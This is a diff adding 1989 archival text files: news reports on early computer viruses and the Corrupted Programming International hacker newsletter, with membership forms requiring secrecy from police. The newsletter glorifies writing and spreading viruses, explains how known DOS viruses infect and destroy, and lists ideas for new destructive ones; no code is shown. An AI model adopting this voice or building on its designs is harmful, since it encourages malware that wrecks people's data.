down within hours + when the message began multiplying, stuffing the computersY memories. + No permanent damage was done, and I.B.M. says it has made repetition + impossible. 
+ + Demonstrations have shown that viruses can invade the screens of users +with the highest security classification, according to Fred Cohen of +Cincinnati, a researcher who coined the term ocomputer Viruses.@ A standard +computer-protection device at intelligence agencies, he says, denies giving +access by a person at one security level to files of anyone else at a higher +level and allows reading but denies writing of files of anyone lower. + + This, however, oallows the least trusted user to write a program that +can be used by everyone@ and is overy dangerous,@ he says. + + Computers oare all at risk,@ says Cohen, oand will continue to be... not +just from computer viruses. But the viruses represent a new level of threat +because of their subtleness and persistence.@ + + +1.) Computer oviruses@ are actually immature computer programs. Most are + written by malicious programmers intent on destroying information in + computers for fun. + +2.) Those who write virus programs often conceal them on floppy disks that + are inserted in the computer. The disks contain all programs needed to + run the machine, such as word processing programs, drawing programs or + spread sheet programs. + +3.) A malicious programmer makes the disk available to others, saying it + contains a useful program or game. These programs can be lent to others + or put onto computerized: obulletin boards@ where anyone can copy them + for personal use. + +4.) A computer receiving the programs will oread@ the disk and the tiny virus + program at the same time. The virus may then order the computer to do a + number of things: + + A.) Tell it to read the virus and follow instructions. + + B.) Tell it to make a copy of the virus and place it on any disk inserted + in the machine today. + + C.) Tell it to check the computerYs clock, and on a certain date destroy + information that tells it where data is stored on any disk: if an + operator has no way of retrieving information, it is destroyed. + + D.) 
Tell it not to list the virus programs when the computer is asked for + an index of programs. + +5.) In this way, the computer will copy the virus onto many disks--perhaps + all or nearly all the disks used in the infected machine. The virus may + also be passed over the telephone, when one computer sends or receives + data from another. + +6.) Ultimately hundreds or thousands of people may have infected disks and + potential time bombs in their systems. + + + ----------------------------------------------- + ZVirusY infected hospital computers, + led to epidemic of software mix-ups + ----------------------------------------------- + From the San Diego Tribune + March 23, 1989 + + + BOSTON (UPI) -- A ovirus@ infected computers at three Michigan hospitals +last fall and disrupted patient diagnoses at two of the centers in what appears +to be the first such invasion of a medical computer, it was reported yesterday. + + The infiltration did not harm any patients but delayed diagnoses by +shutting down computers, creating files of non-existent patients and garbling +names on patient records, which could have caused more serious problems, a +doctor said. + + oIt definitely did affect care in delaying things and it could have +affected care in terms of losing this information completely,@ said Dr. Jack +Juni, a staff physician at the William Beaumont Hospitals in Troy and Royal Oak, +Mich., two of the hospitals involved. + + If patient information had been lost, the virus could have forced doctors +to repeat tests that involve exposing patients to radiation, Juni said +yesterday. The phony and garble files could have caused a mix-up in patient +diagnosis, he said. + + oThis was information we were using to base diagnoses on,@ said Juni, who +reported the case in a letter in The New England Journal of Medicine. oWe were +lucky and caught it in time.@ + + A computer virus is a set of instructions designed to reproduce and spread +>from computer to computer. 
Some viruses do damage in the process, such as +destroying files or overloading computers. + + Paul Pomes, a computer virus expert at the University of Illinois in +Champaign, said this was the first case he had heard of in which a virus had +disrupted a computer used for patient care or diagnosis in a hospital. + + Such disruptions could become more common as personal computers are used +more widely in hospitals, Juni and Pomes said. More people know how to program +-- and therefore sabotage -- personal computers than the more specialized +computers that previously have been used, Pomes said. + + The problem in Michigan surfaced when a computer used to display images +used to diagnose cancer and other diseases began to malfunction at the 250-bed +Troy hospital in August 1988. + + In October, Juni discovered a virus in the computer in the Troy hospital. +The next day, Juni found the same virus in a similar computer in the 1,200-bed +Royal Oak facility, he said. + + The virus apparently arrived in a program in a storage disk that was part +of the Troy computer system, he said. It probably was spread inadvertently to +the Royal Oak computer on a floppy disk used by a resident who worked at both +hospitals to write a research paper, he said. + + The virus also spread to the desk-top computers at the University of +Michigan Medical Center in Ann Arbor, where it was discovered before it caused +problems. + + + oProsecutor Wins Conviction In Computer Data Destruction@ + + September 21, 1988 + + + Fort Worth, Texas (AP) - A former programmer has been convicted of planting +a computer ovirus@ in his employerYs system that wiped out 168,000 records and +was activated like a timb bomb, doing its damage two days after he was fired. 
+ + Tarrant County Assistant District Attorney Davis McCown said he believes e +is the first prosecutor in the country to have someone convicted for destroying +computer records using a ovirus.@ + + oWeYve had people stealing through computers, but not this type of case,@ +McCown said. oThe basis for this offense is deletion.@ + + oItYs very rare that the people who spread the viruses are caught,@ said +John McAfee, chairman of the Computer Virus Industry Association in Santa Clara, +which helps educate the public about viruses and find ways to fight them. + + oThis is absolutely the first time@ for a conviction, McAfee said. + + oIn the past, prosecutors have stayed away from this kind of case because +theyYre too hard to prove,@ McCown said yesterday. They have also been reluctant +because the victim doesnYt want to let anyone know there has been a breach of +security.@ + + Donald Gene Burleson, 40, was convicted of charges of harmful access to a +computer, a third-degree feloy that carries up to 10 years in prison and up to +$5,000 in fines. + + A key to the case was the fact that State District Judge John Bradshaw +allowed the computer program that deleted the files to be introduced as +evidence, McCown said. It would have been difficult to get a conviction +otherwise, he said. + + The District Court jury deliberated six hours before bringing back the +first conviction under the stateYs 3-year-old computer sabotage law. + + Burleson planted the virus in revenge for his firing from an insurance +company, McCown said. + + Jurors were told during a technical and sometimes-complicated three-week +trial that Burleson planted a rogue program in the computer system used to store +records at USPA and IRA Co., a Fort Worth-based insurance and brokerage firm. + + A virus is a computer program, often hidden in apparently normal computer +software, that instructs the computer to change or destroy information at a +given time or after a certain sequence of commands. 
+ + The virus, McCown said, was activated Sept. 21, 1985, two days after +Burleson was fired as a computer programmer, because of alleged personality +conflicts with other employees. + + oThere were a series of programs built into the system as early as Labor +Day (1985),@ McCown said. oOnce he got fired, those programs went off.@ + + The virus was discovered two days later, after it had eliminated 168,00 +payroll records, holding up company paychecks for more than a month. The virus +could have caused hundreds of thousands of dollars in damage to the system had +it continued, McCown said. + + +Subject: CPI Issue 2 11/11 +To: tk0jut2 +Original_To: BITNET%"tk0jut2@niu" + + + WEST COAST CORRUPTED ALLEGIANCE PRESENTS: + + -=-=-=-=-=-=-=-=-=-=-=-=-=-=-=-=-=-=-=-=-=-=-=-=-=-=-=-=-=-=-=-=-=-=- + + >> CORRUPTED PROGRAMMING INTERNATIONAL << + >> MEMBERSHIP APPLICATION << + + -=-=-=-=-=-=-=-=-=-=-=-=-=-=-=-=-=-=-=-=-=-=-=-=-=-=-=-=-=-=-=-=-=-=- + (CPI is a sub-group of WCCA) + +NOTE: The following information is of a totally confidential nature. We must + question you in depth and thouroughly so that our knowledge and idea + of you will be quite complete. Remember, it is the fate of our voting + members who will decide upon your membership, as the result of your + response to this questionarre. Please answer the following completely + and to the best of your ability. Also note that we may decide to voice + validate you or gather any other information through other sources and + will discover if you have placed false or misleading information on + this application. 
+ + +PERSONAL INFORMATION: +----------------------------------------------------------------------------- + Alias(es) You HAVE Used : + Alias(es) You Currently Use : + Your FULL REAL Name : + Your Voice Phone Number :(###)###-#### + Your Data Phone Number :(###)###-#### + Your Mailing Address : + Your City, State & Zip : + Your Age : + Occupation/Grade : + Place of Employment/School : + Work Phone Number : + Your Interests And Hobbies : + +Are You IN ANY WAY Affiliated With ANY Governmental/Law Enforcement Agency? +If So, In What Way? (Such as FBI/Sheriff/Police/etc. YOU KNOW WHAT I MEAN) +: +: + +Are You IN ANY WAY Affiliated With The Telephone Company Or Any Type Of Phone, +Data, Or Long Distance Type Of Company? If So, In What Way? +: +: + + +COMPUTER INFORMATION/EXPERIENCE +----------------------------------------------------------------------------- + Computer Experience (time) : + Modeming Experience (time) : + BBSYs You Frequent (Name/#) : + Some Elite References : + Computers You Have Used : + Computer(s) You Are Using : + Computer You Prefer : + Languages You Have Tried : + Languages You Know Well : + Your Best Language : + Have You Ever Phreaked : + Do You Phreak Regularly : + Have You Ever Hacked : + Do You Hack Regularly : + Have You Ever Cracked : + Do You Crack Regularly : + Ever Made A Virus/Trojan : + Major Accomplishments : + : + +INTERVIEW +----------------------------------------------------------------------------- +Answer In 4 Lines Or Less: + +What do you think Corrupted Programming International is? +: +: +: +: + +When did you first hear about CPI? +: +: +: +: + +Why do you want to be a member of CPI? +: +: +: +: + +Do you know any of the members of CPI? Can you name any or the founders of CPI? +: +: +: +: + +Have you considered the distribuition of Viruses/Trojans as a ocrime@? Why +or why not? Have you ever considered the consequences that could result +>from the acts of releasing a Virus/Trojan? (morally speaking?) 
+: +: +: +: + +Have you written any text files? (On any underground type of subject) +: +: +: +: + +Are you a member of any other group(s)? Can you name them and their HQ BBS? +: +: +: +: + +What would you consider yourself if you were admitted into CPI, a programmer, +a phreaker, a distributor, a information gatherer, or a vegetable? +: +: +: +: + +Why would you ever want to release or aid in releasing a potential virus/trojan +to the public? +: +: +: +: + +Can you contribute to CPI? How? +:(do you have access to info concerning virus/trojans) +:(exceptional programmer?) +:(got connections?) +:(anything extraordinary?) + + +OATH +----------------------------------------------------------------------------- +Typing your name at the bottom of the following paragraph is the same as +signing your name on an official document. + +authorities - As stated in the document below, the term authorities shall + be defined as any law enforcement agency or any agency that + is/may be affiliated with any law enforcement agency. Also, + this includes any company or agency or person which is/may + be involved with the telephone company or any telephone-type + of service(s). + +I [your name here] do solemnly swear never to report neither to my peers nor +the authorities the actions and duties performed by this group, Corrupted +Programming International, on any account. Also, I realize that if I leave +CPI and am no longer a member of CPI, it is my duty, as signed below, to uphold +the greatest confidence of CPIYs activities, and I agree that any information I +may report to any one or any thing CANNOT be used against CPI and its members +in a court of law. I fully understand that if I were to become affiliated with +the authorities that it would be my duty to remove myself from any membership +if my position presented itself as contradictory towards the group, CPI and its +members. 
I also comprehend that if I were to be confronted by the authorities, +it my duty as a CPI member, as signed below, is to never disclose or discuss +CPIYs activities to them; however, if I do, I fully agree that the information +disclosed or discussed cannot then be used against CPI or any member(s) of CPI +in a court of law. I further agree that all the terms and restrictions as noted +above also correspond to the entire group of WCCA, West Coast Corrupted +Allegiance. + +Typed:____________________ + + +----------------------------------------------------------------------------- + .Answer Each Question To The Best And Fullest Of Your Ability. +----------------------------------------------------------------------------- + + Upload ALL Applications To The WCCA Headquarters BBS + + T H E A N D R O M E D A S T R A I N + + * 619-566-7093 * 1200/2400 * 24 HRS * + + + _______________________<==| CURRENT WCCA NODES |==>_________________________ + /--------------+------------------------------------+-----------------+------\ + | Phone Number | Node Name | Sysop | Baud | + +--------------+------------------------------------+-----------------+------+ + | 619-484-3508 | The Phrozen Phorest | Ancient Mariner | 1200 | + \--------------+------------------------------------+-----------------+------/ + + Future WCCA Support BBSYs Will Be Active - Applications May Be Turned In Then diff --git a/textfiles.com/virus/cpi1.vir b/textfiles.com/virus/cpi1.vir new file mode 100644 index 00000000..3027d139 --- /dev/null +++ b/textfiles.com/virus/cpi1.vir 
@@ -0,0 +1,473 @@ + Computer Viruses - A Protagonist's Point Of View + -----===] CORRUPTED PROGRAMMING INTERNATIONAL [===----- + + == CPI Newsletter #1 == + [ Article Written By Doctor Dissector ] + Released : June 27, 1989 + + Call The CPI Headquarters + 619-566-7093 + 1200/2400 Baud :: Open 24 Hours + + + + [1.1] Introduction: + ------------------- + + Welcome to "Computer Viruses - A Protagonist's Point Of View." This + letter, perhaps the beginning of a small newsletter. Well, this "letter," + is written by one person right now, maybe I'll get some people to send in + more info, ideas, and examples to CPI. If you would like to contribute, + please upload text files to CPI Headquarters (see heading for number) and + leave a note to me telling me you are contributing to our magazine. + + Well, as an overview, this article will cover a few topics dealing + with viruses; however, there will be no examples covered as we are short of + programmers at the moment. That reminds me, if you would like to become a + member of CPI, fill out the accompanying text file and upload it to CPI HQ + as an upload to the Sysop, then leave me and the Sysop some mail to tell us + you registered to become a member. We will get back to you as soon as + possible. + + The purpose of this magazine is to expand and broaden the general + computer user's view and knowledge of the dreadful computer Virus, as well + as a bit on Trojans (not the hardware, the SOFTWARE!). Then, after the + knowledge of these computer crackers is better understood, the second + purpose of this newsletter is to teach both methods of developing and + executing a better virus/trojan. We, VRI, feel viruses and trojans are a + vital part of the computer world, and should stand along the trades of + hacking, phreaking, cracking, pirating, and pyro as an equal, not something + to be looked down upon (unless you are hit by one...). 
+ + In the future, we hope CPI will grow and spread, just like a virus, + and encompass a large domain of the crackers, hackers, and other elite out + there so that the life of this group will be maintained, and that this + newsletter, hopefully, won't be the only issue to be released during the + group's existence. + + Doctor Dissector + CPICV Editor/ANE Author + + + Table Of Contents- + + Phile Subject Author + ----- --------------------------------------------------------- + 1.1 Introduction & Table Of Contents.........Doctor Dissector + 1.2 Viruses- What, Where, Why, How...........Doctor Dissector + 1.3 Aspects Of Some Known Viruses............Doctor Dissector + 1.4 Ideas For Future Viruses.................Doctor Dissector + 1.5 Suggested Reading........................Doctor Dissector + 1.6 Conclusion...............................Doctor Dissector + 1.7 CPI Application..........................Doctor Dissector + +Downloaded From P-80 International Information Systems 304-744-2253 + ---------------------------------------------------------------------- + + [1.2] Viruses- What, Where, Why, How + + + If you are a beginner in this field, you may be curious to what + a virus/trojan is. Perhaps you heard about it through some BBS, or + known someone who had their system crashed by one. Well, this is for + you. + + In the Trojan War, way back when, there existed the Trojan + Horse, right? Well, nowadays, there is a modern version of the Trojan + Horse existing is software. The modern, computer, Trojan horse is + really simple, a psychedelic hacker implants destructive code into a + normal (or fake) file. This modified/fake file, when executed will + destroy or remove something from the host computer, usually format + the hard drive, delete all files, or something similar. In order to + distribute the corrupt phile, the hacker goes and does one or more of + various things; depending on how deranged this individual is (hehe). 
+ These things are covered in the following section. + + A virus, in normal terms is an organism which spreads malign + from one host to another, transmitting itself through biological + lines so that both the previous host and the future host become + infected with the virus. Today, there are computer viruses, and just + like biological viruses, they spread from file to file, host to host, + infecting everything it "sees." These computer viruses can either + destroy the code it infects immediately, or over a period of time, + corrupt or damage the host system it thrives upon. For example, a + virus hidden in a file on a BBS could be downloaded to a host system. + Then, the user who downloaded it executes the file, which executes + normally (as seen by the operator), but at the same time, the virus + attacks other files, and infects them, so that each file owned by the + user becomes infected with the virus. Then, at a given time or when + something is fulfilled by the host system, the virus becomes a trojan + and destroys, encrypts, or damages everything available, infected or + un-infected. In general, a virus is a timed trojan that duplicates + itself to other files, which, in effect sustains the virus's life- + span in the computer world, as more host systems are infiltrated by + the disease. + + Now that I've given you a description of the computer virus and + trojan, we can go onto more complex things... well, not really... + + Ok, now, let's trace the life of a virus. A virus/trojan is born + in the mind of some hacker/programmer that decides to develop + something out of the ordinary, not all viruses/trojans are + destructive, often, some are amusing! Anyway, the hacker programs the + code in his/her favorite language; viruses can be developed with + virtually any language, BASIC, Pascal, C, Assembly, Machine Code, + Batch files, and many more. 
Then, when the disease is complete and + tested, the hacker intentionally infects or implants the code into a + host file, a file that would be executed by another un-suspecting + user, somewhere out there. Then, the hacker does one or more of many + things to distribute his baby. The hacker can upload the infected + file to a local BBS (or many local/LD BBS's), give the infected file + to a computer enemy, upload the infected file to his/her workplace + (if desired...hehe), or execute the phile on spot, on the host + system. Then, the virus, gets downloaded or executed, it infiltrates + the host system, and either infects other files, or trashes the + system instantly. Eventually, the infected system's user gets smart + and either trashes his system manually and starts fresh, or some mega- + technical user attempts to recover and remove the virus from all of + the infected files (a horrendous job). Then, the virus dies, or other + host systems that were previously infected continue, and accidentally + upload or hand out infected files, spreading the disease. Isn't that + neat? + + Now, to answer your questions; I already explained what a + virus/trojan is and how they are developed/destroyed. Now, where do + these suckers come from? Why, some hacker's computer room, of course! + All viruses and trojans begin at some computer where some maniacal + hacker programs the code and implants it somewhere. Then, you ask, + why do they do this? Why hack? Why phreak? Why make stupid pyro piles + of shit? Think about it... This is an ART! Just like the rest. While + Hacking delivers theft of services, Phreaking delivers theft of + services, Cracking/Pirating delivers theft of software and copyright + law breaks, Pyro delivers unlawful arson/explosives, Viruses and + Trojans vandalize (yes, legally it is vandalism and destruction of + property) computer systems and files. 
Also, these are great to get + back at arch-computer enemies (for you computer nerds out there), and + just wreak havoc among your computer community. Yeah, PHUN at it's + best... + + ---------------------------------------------------------------------- + +Downloaded From P-80 International Information Systems 304-744-2253 + ---------------------------------------------------------------------- + + [1.3] Aspects Of Some Known Viruses + + + Many viruses have been written before and probably after you + read this article. A few names include the Israeli, Lehigh, Pakistani + Brain, Alameda, dBase, and Screen. Keep in mind that most viruses + ONLY infect COM and EXE files, and use the Operating System to spread + their disease. Also, many viruses execute their own code before the + host file begins execution, so after the virus completes passive + execution (without "going off") the program will load and execute + normally. + + Israeli - This one is a TSR virus that, once executed, stayed in + memory and infected both COM and EXE files, affecting both HARD and + FLOPPY disks. Once executed, the virus finds a place to stay in the + system's memory and upon each execution of a COM or EXE file, copies + itself onto the host phile. This one is very clever, before infecting + the file, it preserves the attributes and date/time stamp on the + file, modifies the files attributes (removes READ only status so it + can write on it), and then restores all previous values to the file. + This virus takes very little space, and increases the host file size + by approximately 1800 bytes. The trigger of this virus is the date + Friday the 13th. This trigger will cause the virus to either trash + the disk/s or delete the files as you execute them, depending on the + version. Whoever wrote this sure did a nice job.... + + Lehigh - This one infects the COMMAND.COM file, which is always + run before bootup, so the system is ready for attack at EVERY bootup. 
+ It hides itself via TSR type and when any disk access is made, the + TSR checks the COMMAND.COM to see if it is infected. Then if it + isn't, it infects it, and adds a point to its counter. When the + counter reaches 4, the virus causes the disk to crash. This one, + however, can be stopped by making your COMMAND.COM Read-Only, and the + date/time stamp is not preserved, so if the date/time stamp is + recent, one could be infected with this virus. This virus is + transferred via infected floppy disks as well as a clean disk in an + infected system. It can not infect other hosts via modem, unless the + COMMAND.COM is the file being transferred. + + Pakistani Brain - This one infects the boot sector of a floppy + disk. When booting off of the disk, the virus becomes a TSR program, + and then marks an unused portion of the disk as "bad sectors." The + bad sectors, cannot be accessed by DOS. However, a disk directory of + an infected disk will show the volume label to be @ BRAIN. A CHKDSK + will find a few bad sectors. When you do a directory of a clean disk + on an infected system, the disk will become infected. The virus has + no trigger and immediately begins to mark sectors bad even though + they are good. Eventually, you will have nothing left except a bunch + of bad sectors and no disk space. The virus itself has the ASCII + written into it with the words "Welcome the the Dungeon" as well the + names of the supposed authors of the virus, and address, telephone + number, and a few other lame messages. To inoculate your system + against this virus, just type 1234 at byte offset location 4 on the + boot track (floppy disks). + + Alameda - This virus also infects the boot sector of the host + system. It is very small and inhabits ONE sector. This one only + damages floppy disks. 
If you boot from a diseased disk, the virus + loads itself into HIGH memory and during a warm boot, it remains in + memory and infects any other clean disks being booted from on the + infected system. It then replaces the boot track with the virus track + and replaces the boot track on the last track of the disk, so any + data located on the last track is corrupted. All floppy disks + inserted during reboot can catch this virus. This virus only infects + IBM PC's and XT's, however, it does not infect 286's or 386's. + + dBase - This one is a TSR virus that works in a manner similar + to the Israeli virus. It looks for files with a DBF extension, then + it replicates itself in all DBF files, preserving file size, and all + attributes. After the first 90 days, the virus destroys your file + allocation table and corrupts all data in the DBF files. This virus + creates a hidden file, BUG.DAT that indicates the bytes transposed + (in order to preserve file specifications). Run a CHKDSK to make sure + you don't have any extra hidden files or a BUG.DAT in your dBase + directory. If you create a BUG.DAT file manually in your directory, + making it read-only, you will be safe from this virus. + + Screen - This one is another TSR virus that comes on and off + periodically. When it is on, it examines the screen memory and looks + for any 4 digits starting at a random place on the screen. Then it + transposes two of them, this is not a good thing. It infects every + COM file in your directory, HARD and FLOPPY disks can be infected. + You can use a ASCII searcher to check if you are infected by + searching for "InFeCt" in your COM files. If you have this written, + read the 4 bytes immediately preceding it and overwrite the first 4 + bytes of the program with their value. Then, truncate the program at + their stored address. You will rid yourself of this virus. Make sure + you use a clean copy of you editor for this. 
+ + Other viruses include MAC, AMIGA, and many other environments. + By the way, other computer systems other than IBM/DOS may become part + of CPI if you qualify. + + Anyway, these are a few viruses I have read on and thus passed + the information to you, I hope you can learn from them and get some + ideas for some. + +Downloaded From P-80 International Information Systems 304-744-2253 + ---------------------------------------------------------------------- + + [1.4] Ideas For Future Viruses + + + Since I have covered viruses already in existence, lets talk + about viruses that can or may exist in the near future. These are not + even close to half the ideas possible for destruction with + trojans/viruses available, but will pose as a challenge to you who + are short of ideas. + + CSR Virus - A CMOS Stay Resident VIRUS that will implant itself + in the CMOS memory of the AT (286/386/486?) which will execute upon + every bootup. This one would be VERY nice. + + Failsafe Virus - Preserves ALL attributes, Preserves file size, + remains TSR but hidden to TSR location programs, Modifies attributes + to get around Read-Only files, Infects ALL files (Not only COM and + EXE), encrypts all data on trigger (irreversible) but preserves + original file size/attributes. + + Format Virus - A virus which is TSR and when a DOS format or any + other FORMAT type of call is called, will FORMAT every other track, + but will not allow DOS to notice. + + Write Virus - A virus that intercepts write to disk, which + deletes the disk write, and marks sector as bad at write point. + + ASCII Virus - Virus that would scramble ASCII text in any file + at trigger. + + Low Level Format Virus - Virus that low level formats (BAD + format) HD in background with data still intact. I have seen regular + background LLF programs, and it keeps data in place, but it does it + correctly... hmmm...? + + Hide Virus - A Virus that hides files slowly. 
+ + Crash Virus - Virus that emulates typical system crashes/freezes + occasionally. Causes BIOS to freeze and write BIOS ERROR messages on + screen. + + Modem Virus - One that remains in boot sector and TSR and + monitors data from serial ports, puts in "artificial" line-noise. + NICE! + + These are just a few I thought up... these could be really + good... Think of some more and call CPI HQ TODAY! + +Downloaded From P-80 International Information Systems 304-744-2253 + ---------------------------------------------------------------------- + + [1.5] Suggested Reading + + + The following list is a compiled listing of some material I have + read as well as other sources you MIGHT find information on + concerning viruses and trojan horses. Happy trashing.... + + + "Know Thy Viral Enemy" by Ross M. Greenberg + BYTE Magazine + June 1989, pg 275-280 + + "Viruses: Assembly, Pascal, BASIC & Batch" by Tesla Coil ][ + Phreakers And Hackers Underground Network Newsletter (PHUN) + Issue #3, Volume 2, Phile #2 + + "Computer Viruses: A High Tech Disease" by Abacus + 2600 Magazine + Volume 5, Number 2 + +Downloaded From P-80 International Information Systems 304-744-2253 + ---------------------------------------------------------------------- + + [1.6] Conclusion + + + Thus ends the first issue of CPI's "Computer Viruses: A + Protagonist's Point Of View." We hope you enjoyed it and we hope it + was informative and complete (at least about the specific issues). + + We, VRI, hope that you will share your information and comments + with us at VRI Headquarters, as this newsletter will require both + information and an expansion of our current member base. If you feel + you have what it takes to gather, read, or program for VRI, send us + an application today. + + Oh yeah, if this happens to be the only issue of VRICV, oh well, + and many thanx to those who read it at least once, and enjoyed it (or + laughed at it). Until our (my?) 
next issue, have phun and don't get + toooo wild...... + + + + + =====[ CPI Headquarters * 619-566-7093 * 1200/2400bps * 24Hrs ]===== + +Downloaded From P-80 International Information Systems 304-744-2253 + [1.7] CPI Application + -=-=-=-=-=-=-=-=-=-=-=-=-=-=-=-=-=-=-=-=-=-=-=-=-=-=-=-=-=-=-=-=-=-=- + + >> CORRUPTED PROGRAMMING INTERNANATIONAL<< + >> MEMBERSHIP APPLICATION << + + -=-=-=-=-=-=-=-=-=-=-=-=-=-=-=-=-=-=-=-=-=-=-=-=-=-=-=-=-=-=-=-=-=-=- + +NOTE: The following information is of a totally confidential nature. We must + question you in depth and thouroughly so that our knowledge and idea + of you will be quite complete. Remember, it is the fate of our voting + members who will decide upon your membership, as the result of your + response to this questionairre. Please answer the following completely + and to the best of your ability. + + +PERSONAL INFORMATION: +----------------------------------------------------------------------------- + Alias(es) You HAVE Used : + Alias(es) You Currently Use : + Your REAL FULL NAME : + Your Voice Phone Number :(###)###-#### + Your Data Phone Number :(###)###-#### + Your City & State : + Your Age : + Occupation/Grade : + Place Of Employment : + Work Phone Number : + Your Interests And Hobbies : + +Is Your Job IN ANY WAY Related To ANY Governmental/Law Enforcement Agency? +If So, In What Way? 
(Such as FBI, Sheriff, Police) +: +: + + +COMPUTER INFORMATION/EXPERIENCE +----------------------------------------------------------------------------- + Computer Experience (time) : + Modeming Experience (time) : + BBS's You Frequent (Name/#) : + Elite References : + Computers You Have Used : + Computer You Are Using : + Computer You Prefer : + Languages You Have Tried : + Languages You Know Well : + Your Best Language : + Have You Ever Phreaked : + Do You Phreak Alot : + Have You Ever Hacked : + Do You Hack Alot : + Have You Ever Cracked : + Do You Crack Alot : + Ever Made A Virus/Trojan : + Major Accomplishments : + + +MISC INFORMATION +----------------------------------------------------------------------------- +Answer In 4 Lines Or Less: + + +What do you think Corrupted Programming International is? +: +: +: +: + +When did you first hear about CPI? +: +: +: +: + +Why do you want to be a member of CPI? +: +: +: +: + +Do you know any of the members of CPI? Can you name a few? +: +: +: +: + +Have you considered the distribuition of viruses/trojans as a "crime"? Why +or why not? (Morally speaking?) +: +: +: +: + +Have you written any text files? (On any underground type of subject?) +: +: +: +: + +Are you a member of any other group(s)? Can you name them and their HQ BBS? +: +: +: +: + +Can you contribute to CPI? How? +:(Do you have access to info concerning virus/trojans) +:(Exceptional programmer?) +:(Got connections?) +:(Anything extraordinary?) + + +----------------------------------------------------------------------------- + .Answer Each Question To The Best And Fullest Of Your Ability. +----------------------------------------------------------------------------- + + Upload ALL Applications To The CPI Headquarters BBS + *(619) 566-7093 * 1200/2400 * 24 Hrs* + + Future CPI Support BBS's Will Be Active - Applications May Be Turned In Then + +Downloaded From P-80 International Information Systems 304-744-2253 
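Review bot: the capture banner "Downloaded From P-80 International Information Systems 304-744-2253" recurs throughout this hunk, sitting between sections 1.2/1.3, 1.3/1.4, 1.4/1.5, 1.5/1.6, before the [1.7] application and again as the final line, so the newsletter text is interrupted by a BBS download stamp that was never part of the original issue. State in the commit message whether these banners are kept deliberately as part of a faithful archival copy of the P-80 download, or strip them so each section reads continuously; as committed, a reader cannot tell which was intended.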
diff --git a/textfiles.com/virus/cpi2.vir b/textfiles.com/virus/cpi2.vir new file mode 100644 index 00000000..3bac7a1a --- /dev/null +++ b/textfiles.com/virus/cpi2.vir 
@@ -0,0 +1,2124 @@ +[2.1] * * * * * * * * * * * * * * * * * * * * * * * * * * * * * + * * + * @@@@@@@@@@@@@ @@@@@@@@@@@@@ @@@@@@@@@@@@@@@ * + * @@@@@@@@@@@@@@@ @@@@@@@@@@@@@@@ @@@@@@@@@@@@@@@ * + * @@@@ @@@@ @@@@ @@@@ @@@ * + * @@@ @@@ @@@@ @@@ * + * @@@ @@@@@@@@@@@@@@@ @@@ * + * @@@ @@@@@@@@@@@@@@ @@@ * + * @@@ @@@ @@@ * + * @@@@ @@@@ @@@ @@@ * + * @@@@@@@@@@@@@@@ @@@ @@@@@@@@@@@@@@@ * + * @@@@@@@@@@@@@ @@@ @@@@@@@@@@@@@@@ * + * * + * * * * * * * * * * * * * * * * * * * * * * * * * * * * * + + C O R R U P T E D + + P R O G R A M M I N G + + I N T E R N A T I O N A L + + + + presents: + + + @@@@@@@@@@@@@@@@@@@@@@@@@@@@@@@@@@@@@@@ + @ @ + @ Virili And Trojan Horses @ + @ @ + @ A Protagonist's Point Of View @ + @ @ + @ Issue #2 @ + @ @ + @@@@@@@@@@@@@@@@@@@@@@@@@@@@@@@@@@@@@@@ + + + + + + + + DISCLAIMER::All of the information contained in this newsletter reflects the + thoughts and ideas of the authors, not their actions. The sole + purpose of this document is to educate and spread information. + Any illegal or illicit action is not endorsed by the authors or + CPI. The authors and CPI are not responsible for any information + which may present itself as old or mis-interpreted, and actions + by the reader. Remember, 'Just Say No!' + + + + + + + + + + + + +CPI #2 @@@@@@@@@@@@@@@@@@@@@@@@@@@@@@@@@@@@@@@@@@@@@@@@@@@@@@@@@@@@@@@@@@@@@@@@ +Issue 2, Volume 1 @@@@@@@@@@@@@@@@@@@@@@@@@@@@@@@@@@@@@@@@@@@@@@@@@@@@@@@@@@@@@ +Release Date::July 27,1989 @@@@@@@@@@@@@@@@@@@@@@@@@@@@@@@@@@@@@@@@@@@@@@@@@@@@ + + + + + + Introduction To CPI#2 + --------------------- + Well, here is the "long awaited" second issue of CPI, A Protagonist's Point +of view. This issue should prove a bit interesting, I dunno, but at least +entertaining for the time it takes to read. Enjoy the information and don't +forget the disclaimer. + Oh yes, if you have some interesting articles or an application to send +us, just see the BBS list at the end of this document. Thanx. 
All applications +and information will be voted on through the CPI Inner Circle. Hope you enjoy +this issue as much as we enjoyed typing it... hehe... + Until our next issue, (which may be whenever), good-bye. + + Doctor Dissector + + + Table of Contents + ----------------- + Part Title Author + ----------------------------------------------------------------------------- + 2.1 Title Page, Introduction, & TOC....................... Doctor Dissector + 2.2 Another Explanation Of Virili And Trojans............. Acid Phreak + 2.3 V-IDEA-1.............................................. Ashton Darkside + 2.4 V-IDEA-2.............................................. Ashton Darkside + 2.5 The Generic Virus..................................... Doctor Dissector + 2.6 Aids.................................................. Doctor Dissector + 2.7 Batch File Virus...................................... PHUN 3.2 + 2.8 Basic Virus........................................... PHUN 3.2 + 2.9 The Alemeda Virus..................................... PHUN 4.3 + 2.10 Virili In The News.................................... Various Sources + 2.11 Application For CPI................................... CPI Inner Circle + (CPI Node Phone #'s Are In 2.11) + +Downloaded From P-80 International Information Systems 304-744-2253 + WEST COAST CORRUPTED ALLEGIANCE PRESENTS: + + -=-=-=-=-=-=-=-=-=-=-=-=-=-=-=-=-=-=-=-=-=-=-=-=-=-=-=-=-=-=-=-=-=-=- + + >> CORRUPTED PROGRAMMING INTERNATIONAL << + >> MEMBERSHIP APPLICATION << + + -=-=-=-=-=-=-=-=-=-=-=-=-=-=-=-=-=-=-=-=-=-=-=-=-=-=-=-=-=-=-=-=-=-=- + (CPI is a sub-group of WCCA) + +NOTE: The following information is of a totally confidential nature. We must + question you in depth and thouroughly so that our knowledge and idea + of you will be quite complete. Remember, it is the fate of our voting + members who will decide upon your membership, as the result of your + response to this questionarre. 
